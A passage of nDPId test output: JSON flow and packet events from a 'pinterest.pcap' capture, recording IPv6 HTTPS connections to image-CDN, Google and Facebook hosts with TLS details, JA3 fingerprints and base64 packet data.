-03219{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":876,"source":"pinterest.pcap","alias":"nDPId-test","flow_id":16,"flow_state":"info","flow_packets_processed":12,"flow_first_seen":1605289714782,"flow_last_seen":1605289714869,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1388,"flow_tot_l4_payload_len":6069,"flow_avg_l4_payload_len":505,"midstream":0,"thread_ts_msec":1605289714869,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"2a04:4e42:1d::720","src_port":57050,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS","breed":"Safe","category":"Media"},"tls": 
{"version":"TLSv1.2","client_requested_server_name":"images.unsplash.com","server_names":"imgix2.map.fastly.net,*.camp-fire.jp,*.carwow.co.uk,*.carwow.de,*.carwow.es,*.catchandrelease.com,*.dorothee-schumacher.com,*.footway.com,*.img-ikyu.com,*.imgix.drizly.com,*.instamotor.com,*.microdinc.com,*.msastaging.com,*.peddle.com,*.remax.ca,*.ustudio.com,*.vaping360.com,*.weber.com,article-image-ix.nikkei.com,assets.eberhardt-travel.de,assets.verishop.com,assets.verishop.xyz,cdn.airstream.com,cdn.elementthree.com,cdn.hashnode.com,cdn.naturalhealthyconcepts.com,cdn.parent.eu,cdn.phonehouse.es,cdn.shiplus.co.il,i.drop-cdn.com,i.upworthy.com,image.volunteerworld.com,imageproxy.themaven.net,images-dev.takeshape.io,images.101cookbooks.com,images.beano.com,images.businessoffashion.com,images.congstar.de,images.diesdas.digital,images.fandor.com,images.greetingsisland.com,images.malaecuia.com.br,images.omaze.com,images.roulottesgagnon.com,images.takeshape.io,images.thewanderful.co,images.unsplash.com,images.victoriaplum.com,images.vraiandoro.com,img-1.homely.com.au,img-stack.imagereflow.com,img.badshop.se,img.bernieandphyls.com,img.bioopticsworld.com,img.broadbandtechreport.com,img.broadwaybox.com,img.bygghemma.se,img.bygghjemme.no,img.byggshop.se,img.cablinginstall.com,img.dentaleconomics.com,img.dentistryiq.com,img.evaluationengineering.com,img.golvshop.se,img.grudado.com.br,img.industrial-lasers.com,img.induux.de,img.intelligent-aerospace.com,img.inturn.co,img.laserfocusworld.com,img.ledsmagazine.com,img.lightwaveonline.com,img.militaryaerospace.com,img.mychannels.video,img.officer.com,img.offshore-mag.com,img.ogj.com,img.perioimplantadvisory.com,img.plasticsmachinerymagazine.com,img.prevu.com,img.rdhmag.com,img.speedcurve.com,img.strategies-u.com,img.utilityproducts.com,img.vision-systems.com,img.waterworld.com,img.workbook.com,img.xlhemma.se,img1.nowpurchase.com,iw.induux.de,m.22slides.com,media.sailrace.com,media.useyourlocal.com,pictures.hideaways.dk,raven.contrado.com,reso
urces.intuitive.com,static.doorsuperstore.co.uk","ja3":"b32309a26951912be7dba376398abc3b","ja3s":"16c0b3e6a7b8173c16d944cfeaeee9cf","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","issuerDN":"C=BE, O=GlobalSign nv-sa, CN=GlobalSign CloudSSL CA - SHA256 - G3","subjectDN":"C=US, ST=California, L=San Francisco, O=Fastly, Inc., CN=imgix2.map.fastly.net","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2,TLSv1.1,TLSv1","fingerprint":"1F:BC:A1:79:48:96:70:32:B8:08:C1:38:D4:20:12:BE:D9:6F:14:B6"}} -00619{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":2206,"source":"pinterest.pcap","alias":"nDPId-test","flow_id":17,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1605289715133,"flow_last_seen":1605289715133,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1605289715133,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"2a00:1450:4007:816::2003","src_port":51582,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00511{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2206,"source":"pinterest.pcap","alias":"nDPId-test","flow_id":17,"flow_packet_id":1,"flow_last_seen":1605289715133,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":94,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":94,"pkt_l4_len":40,"thread_ts_msec":1605289715133,"pkt":"qtsDr8lk5EKm5WPyht1gAUyOACgGQCoBywEgSYsHmR3shSjf9ikqABRQQAcIFgAAAAAAACADyX4Bu+HPmfcAAAAAoAL9IJHxAAACBAWgBAIICjiITggAAAAAAQMDBw=="} 
-00512{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2778,"source":"pinterest.pcap","alias":"nDPId-test","flow_id":17,"flow_packet_id":2,"flow_last_seen":1605289715210,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":94,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":94,"pkt_l4_len":40,"thread_ts_msec":1605289715210,"pkt":"5EKm5WPyqtsDr8lkht1gAAAAACgGPSoAFFBABwgWAAAAAAAAIAMqAcsBIEmLB5kd7IUo3\/YpAbvJfoEpGV7hz5n4oBJXgLSTAAACBAV4AQMDAwQCCArCuSXYOIhOCA=="} -00499{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2781,"source":"pinterest.pcap","alias":"nDPId-test","flow_id":17,"flow_packet_id":3,"flow_last_seen":1605289715210,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":86,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":86,"pkt_l4_len":32,"thread_ts_msec":1605289715210,"pkt":"qtsDr8lk5EKm5WPyht1gAUyOACAGQCoBywEgSYsHmR3shSjf9ikqABRQQAcIFgAAAAAAACADyX4Bu+HPmfiBKRlfgBAB+zhYAAABAQgKOIhOVcK5Jdg="} -00954{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":2792,"source":"pinterest.pcap","alias":"nDPId-test","flow_id":17,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1605289715133,"flow_last_seen":1605289715212,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":517,"flow_tot_l4_payload_len":517,"flow_avg_l4_payload_len":129,"midstream":0,"thread_ts_msec":1605289715212,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"2a00:1450:4007:816::2003","src_port":51582,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Google","breed":"Acceptable","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"www.gstatic.com","ja3":"b32309a26951912be7dba376398abc3b","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}} 
-00619{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":2896,"source":"pinterest.pcap","alias":"nDPId-test","flow_id":18,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1605289715221,"flow_last_seen":1605289715221,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1605289715221,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"2a00:1450:4007:806::200e","src_port":54416,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00511{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2896,"source":"pinterest.pcap","alias":"nDPId-test","flow_id":18,"flow_packet_id":1,"flow_last_seen":1605289715221,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":94,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":94,"pkt_l4_len":40,"thread_ts_msec":1605289715221,"pkt":"qtsDr8lk5EKm5WPyht1gDRmqACgGQCoBywEgSYsHmR3shSjf9ikqABRQQAcIBgAAAAAAACAO1JABu7b0CzwAAAAAoAL9ILgWAAACBAWgBAIICnB0noAAAAAAAQMDBw=="} -00512{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3385,"source":"pinterest.pcap","alias":"nDPId-test","flow_id":18,"flow_packet_id":2,"flow_last_seen":1605289715273,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":94,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":94,"pkt_l4_len":40,"thread_ts_msec":1605289715273,"pkt":"5EKm5WPyqtsDr8lkht1gAAAAACgGPSoAFFBABwgGAAAAAAAAIA4qAcsBIEmLB5kd7IUo3\/YpAbvUkNYqBSe29As9oBJXgJmfAAACBAV4AQMDAwQCCArCuSYncHSegA=="} 
-00499{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3387,"source":"pinterest.pcap","alias":"nDPId-test","flow_id":18,"flow_packet_id":3,"flow_last_seen":1605289715273,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":86,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":86,"pkt_l4_len":32,"thread_ts_msec":1605289715273,"pkt":"qtsDr8lk5EKm5WPyht1gDRmqACAGQCoBywEgSYsHmR3shSjf9ikqABRQQAcIBgAAAAAAACAO1JABu7b0Cz3WKgUogBAB+x19AAABAQgKcHSetMK5Jic="} -00954{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":3394,"source":"pinterest.pcap","alias":"nDPId-test","flow_id":18,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1605289715221,"flow_last_seen":1605289715274,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":517,"flow_tot_l4_payload_len":517,"flow_avg_l4_payload_len":129,"midstream":0,"thread_ts_msec":1605289715274,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"2a00:1450:4007:806::200e","src_port":54416,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Google","breed":"Acceptable","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"apis.google.com","ja3":"b32309a26951912be7dba376398abc3b","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}} 
-00625{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":3395,"source":"pinterest.pcap","alias":"nDPId-test","flow_id":19,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1605289715274,"flow_last_seen":1605289715274,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1605289715274,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"2a03:2880:f030:13:face:b00c::3","src_port":51292,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00512{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3395,"source":"pinterest.pcap","alias":"nDPId-test","flow_id":19,"flow_packet_id":1,"flow_last_seen":1605289715274,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":94,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":94,"pkt_l4_len":40,"thread_ts_msec":1605289715274,"pkt":"qtsDr8lk5EKm5WPyht1gCiKuACgGQCoBywEgSYsHmR3shSjf9ikqAyiA8DAAE\/rOsAwAAAADyFwBu3K5vIYAAAAAoAL9IIqeAAACBAWgBAIICrhM3AoAAAAAAQMDBw=="} -00995{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":3513,"source":"pinterest.pcap","alias":"nDPId-test","flow_id":17,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1605289715133,"flow_last_seen":1605289715287,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1208,"flow_tot_l4_payload_len":1725,"flow_avg_l4_payload_len":287,"midstream":0,"thread_ts_msec":1605289715287,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"2a00:1450:4007:816::2003","src_port":51582,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Google","breed":"Acceptable","category":"Web"},"tls": 
{"version":"TLSv1.3","client_requested_server_name":"www.gstatic.com","ja3":"b32309a26951912be7dba376398abc3b","ja3s":"eb1d94daa7e0344597e756a1fb6e7054","unsafe_cipher":0,"cipher":"TLS_AES_128_GCM_SHA256","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}} -00512{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3659,"source":"pinterest.pcap","alias":"nDPId-test","flow_id":19,"flow_packet_id":2,"flow_last_seen":1605289715301,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":94,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":94,"pkt_l4_len":40,"thread_ts_msec":1605289715301,"pkt":"5EKm5WPyqtsDr8lkht1gAAAAACgGPSoDKIDwMAAT+s6wDAAAAAMqAcsBIEmLB5kd7IUo3\/YpAbvIXBJtCi5yubyHoBJXgCqsAAACBAV4AQMDAwQCCArCuSZZuEzcCg=="} -00500{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3662,"source":"pinterest.pcap","alias":"nDPId-test","flow_id":19,"flow_packet_id":3,"flow_last_seen":1605289715301,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":86,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":86,"pkt_l4_len":32,"thread_ts_msec":1605289715301,"pkt":"qtsDr8lk5EKm5WPyht1gCiKuACAGQCoBywEgSYsHmR3shSjf9ikqAyiA8DAAE\/rOsAwAAAADyFwBu3K5vIcSbQovgBAB+66iAAABAQgKuEzcJcK5Jlk="} -00970{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":3667,"source":"pinterest.pcap","alias":"nDPId-test","flow_id":19,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1605289715274,"flow_last_seen":1605289715301,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":517,"flow_tot_l4_payload_len":517,"flow_avg_l4_payload_len":129,"midstream":0,"thread_ts_msec":1605289715301,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"2a03:2880:f030:13:face:b00c::3","src_port":51292,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": 
{"4":"DPI"},"proto":"TLS.Facebook","breed":"Fun","category":"SocialNetwork"},"tls": {"version":"TLSv1.2","client_requested_server_name":"connect.facebook.net","ja3":"b32309a26951912be7dba376398abc3b","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}} -00995{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":3797,"source":"pinterest.pcap","alias":"nDPId-test","flow_id":18,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1605289715221,"flow_last_seen":1605289715321,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1208,"flow_tot_l4_payload_len":1725,"flow_avg_l4_payload_len":287,"midstream":0,"thread_ts_msec":1605289715321,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"2a00:1450:4007:806::200e","src_port":54416,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Google","breed":"Acceptable","category":"Web"},"tls": {"version":"TLSv1.3","client_requested_server_name":"apis.google.com","ja3":"b32309a26951912be7dba376398abc3b","ja3s":"eb1d94daa7e0344597e756a1fb6e7054","unsafe_cipher":0,"cipher":"TLS_AES_128_GCM_SHA256","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}} -01011{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":3820,"source":"pinterest.pcap","alias":"nDPId-test","flow_id":19,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1605289715274,"flow_last_seen":1605289715333,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1380,"flow_tot_l4_payload_len":1897,"flow_avg_l4_payload_len":316,"midstream":0,"thread_ts_msec":1605289715333,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"2a03:2880:f030:13:face:b00c::3","src_port":51292,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": 
{"4":"DPI"},"proto":"TLS.Facebook","breed":"Fun","category":"SocialNetwork"},"tls": {"version":"TLSv1.3","client_requested_server_name":"connect.facebook.net","ja3":"b32309a26951912be7dba376398abc3b","ja3s":"f4febc55ea12b31ae17cfb7e614afda8","unsafe_cipher":0,"cipher":"TLS_AES_128_GCM_SHA256","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}} -00628{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":6497,"source":"pinterest.pcap","alias":"nDPId-test","flow_id":20,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1605289715782,"flow_last_seen":1605289715782,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1605289715782,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"2a03:2880:f11f:83:face:b00c::25de","src_port":60340,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00512{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":6497,"source":"pinterest.pcap","alias":"nDPId-test","flow_id":20,"flow_packet_id":1,"flow_last_seen":1605289715782,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":94,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":94,"pkt_l4_len":40,"thread_ts_msec":1605289715782,"pkt":"qtsDr8lk5EKm5WPyht1gAWIEACgGQCoBywEgSYsHmR3shSjf9ikqAyiA8R8Ag\/rOsAwAACXe67QBu2RbtWoAAAAAoAL9IBbyAAACBAWgBAIICmcfa8wAAAAAAQMDBw=="} 
-00512{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":6878,"source":"pinterest.pcap","alias":"nDPId-test","flow_id":20,"flow_packet_id":2,"flow_last_seen":1605289715833,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":94,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":94,"pkt_l4_len":40,"thread_ts_msec":1605289715833,"pkt":"5EKm5WPyqtsDr8lkht1gAAAAACgGPSoDKIDxHwCD+s6wDAAAJd4qAcsBIEmLB5kd7IUo3\/YpAbvrtAAp+EJkW7VroBJXgNkoAAACBAV4AQMDAwQCCArCuShfZx9rzA=="} -00501{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":6886,"source":"pinterest.pcap","alias":"nDPId-test","flow_id":20,"flow_packet_id":3,"flow_last_seen":1605289715833,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":86,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":86,"pkt_l4_len":32,"thread_ts_msec":1605289715833,"pkt":"qtsDr8lk5EKm5WPyht1gAWIEACAGQCoBywEgSYsHmR3shSjf9ikqAyiA8R8Ag\/rOsAwAACXe67QBu2RbtWsAKfhDgBAB+10HAAABAQgKZx9r\/8K5KF8="} -00969{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":6914,"source":"pinterest.pcap","alias":"nDPId-test","flow_id":20,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1605289715782,"flow_last_seen":1605289715834,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":517,"flow_tot_l4_payload_len":517,"flow_avg_l4_payload_len":129,"midstream":0,"thread_ts_msec":1605289715834,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"2a03:2880:f11f:83:face:b00c::25de","src_port":60340,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Facebook","breed":"Fun","category":"SocialNetwork"},"tls": {"version":"TLSv1.2","client_requested_server_name":"www.facebook.com","ja3":"b32309a26951912be7dba376398abc3b","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}} 
-00619{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":7909,"source":"pinterest.pcap","alias":"nDPId-test","flow_id":21,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1605289715966,"flow_last_seen":1605289715966,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1605289715966,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"2a00:1450:4007:816::200a","src_port":47790,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00512{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":7909,"source":"pinterest.pcap","alias":"nDPId-test","flow_id":21,"flow_packet_id":1,"flow_last_seen":1605289715966,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":94,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":94,"pkt_l4_len":40,"thread_ts_msec":1605289715966,"pkt":"qtsDr8lk5EKm5WPyht1gDvs7ACgGQCoBywEgSYsHmR3shSjf9ikqABRQQAcIFgAAAAAAACAKuq4Bu2\/h7B4AAAAAoAL9IFQFAAACBAWgBAIICqkvSd0AAAAAAQMDBw=="} -01010{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":8857,"source":"pinterest.pcap","alias":"nDPId-test","flow_id":20,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1605289715782,"flow_last_seen":1605289716018,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1380,"flow_tot_l4_payload_len":1897,"flow_avg_l4_payload_len":316,"midstream":0,"thread_ts_msec":1605289716018,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"2a03:2880:f11f:83:face:b00c::25de","src_port":60340,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Facebook","breed":"Fun","category":"SocialNetwork"},"tls": 
{"version":"TLSv1.3","client_requested_server_name":"www.facebook.com","ja3":"b32309a26951912be7dba376398abc3b","ja3s":"f4febc55ea12b31ae17cfb7e614afda8","unsafe_cipher":0,"cipher":"TLS_AES_128_GCM_SHA256","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}} -00512{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":8901,"source":"pinterest.pcap","alias":"nDPId-test","flow_id":21,"flow_packet_id":2,"flow_last_seen":1605289716021,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":94,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":94,"pkt_l4_len":40,"thread_ts_msec":1605289716021,"pkt":"5EKm5WPyqtsDr8lkht1gAAAAACgGPSoAFFBABwgWAAAAAAAAIAoqAcsBIEmLB5kd7IUo3\/YpAbu6rg79HT9v4ewfoBJXgOHBAAACBAV4AQMDAwQCCArCuSkJqS9J3Q=="} -00501{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":8902,"source":"pinterest.pcap","alias":"nDPId-test","flow_id":21,"flow_packet_id":3,"flow_last_seen":1605289716021,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":86,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":86,"pkt_l4_len":32,"thread_ts_msec":1605289716021,"pkt":"qtsDr8lk5EKm5WPyht1gDvs7ACAGQCoBywEgSYsHmR3shSjf9ikqABRQQAcIFgAAAAAAACAKuq4Bu2\/h7B8O\/R1AgBAB+2WcAAABAQgKqS9KFMK5KQk="} -00978{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":8903,"source":"pinterest.pcap","alias":"nDPId-test","flow_id":21,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1605289715966,"flow_last_seen":1605289716024,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":517,"flow_tot_l4_payload_len":517,"flow_avg_l4_payload_len":129,"midstream":0,"thread_ts_msec":1605289716024,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"2a00:1450:4007:816::200a","src_port":47790,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": 
{"4":"DPI"},"proto":"TLS.GoogleServices","breed":"Acceptable","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"content-autofill.googleapis.com","ja3":"b32309a26951912be7dba376398abc3b","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}} -01019{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":8994,"source":"pinterest.pcap","alias":"nDPId-test","flow_id":21,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1605289715966,"flow_last_seen":1605289716084,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1208,"flow_tot_l4_payload_len":1725,"flow_avg_l4_payload_len":287,"midstream":0,"thread_ts_msec":1605289716084,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"2a00:1450:4007:816::200a","src_port":47790,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.GoogleServices","breed":"Acceptable","category":"Web"},"tls": {"version":"TLSv1.3","client_requested_server_name":"content-autofill.googleapis.com","ja3":"b32309a26951912be7dba376398abc3b","ja3s":"eb1d94daa7e0344597e756a1fb6e7054","unsafe_cipher":0,"cipher":"TLS_AES_128_GCM_SHA256","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}} 
-00627{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":9522,"source":"pinterest.pcap","alias":"nDPId-test","flow_id":22,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1605289716168,"flow_last_seen":1605289716168,"flow_idle_time":7440000,"flow_min_l4_payload_len":158,"flow_max_l4_payload_len":158,"flow_tot_l4_payload_len":158,"flow_avg_l4_payload_len":158,"midstream":1,"thread_ts_msec":1605289716168,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"2a00:1450:4007:805::2003","src_port":43562,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00721{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":9522,"source":"pinterest.pcap","alias":"nDPId-test","flow_id":22,"flow_packet_id":1,"flow_last_seen":1605289716168,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":244,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":244,"pkt_l4_len":190,"thread_ts_msec":1605289716168,"pkt":"qtsDr8lk5EKm5WPyht1gB32\/AL4GQCoBywEgSYsHmR3shSjf9ikqABRQQAcIBQAAAAAAACADqioBu9lam\/a\/4e68gBgE1TyJAAABAQgKZPSVcMK4jAQXAwMAmbA2YtBqXOwsPZhf0xplQUhs5uebiQ6HrXX0rQcB3CzDNqt6KEFEtOrnLbiyKoAl0\/PfpLU5lSyfN4b6GWAPMuxRzKK1mYHeU6cm19ssJsGj28uoKpDNJuLbc68jHie5jcE8\/swMHjb\/rsshDlUuBkbS0PBg+fBq\/uDg8aBU7dQCoscpqfDhz7OaLw8PBcid6Woaoneonk0XRQ=="} 
